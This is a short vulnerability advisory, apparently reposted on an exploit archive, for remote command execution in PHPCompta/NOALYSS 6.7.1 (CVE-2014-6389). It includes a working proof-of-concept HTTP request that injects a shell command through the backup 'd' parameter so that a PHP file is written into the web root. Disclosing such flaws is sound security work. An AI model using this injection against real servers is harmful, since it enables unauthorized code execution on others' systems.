PHPCompta / NOALYSS 6.7.1 5638 - Remote Command Execution Vulnerability

Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS
CVE: CVE-2014-6389
Vendor: PHPCompta
Product: PHPCompta/NOALYSS
Affected version: 6.7.1 5638
Fixed version: 6.7.2
Reported by: Jerzy Kramarz
 
Details:
 
PhpCompta 6.7.1-2 does not validate the syntax of the commands when processing backup requests from users. It is possible to abuse the 'd' parameter to inject additional parameters that will then be passed via the php passthru() function to create a backup file, which will subsequently be executed. The proof of concept below will create a file 'exploit.php' in the root directory of the application, which will execute phpinfo() function when called.
 
GET /phpcompta/backup.php?sa=b&t=m&d=123;%20echo%20%22%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%22%20>%20exploit.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3nckv75pburv54tm2iq79dfgl6
Connection: keep-alive

#  0day.today [2018-04-09]  #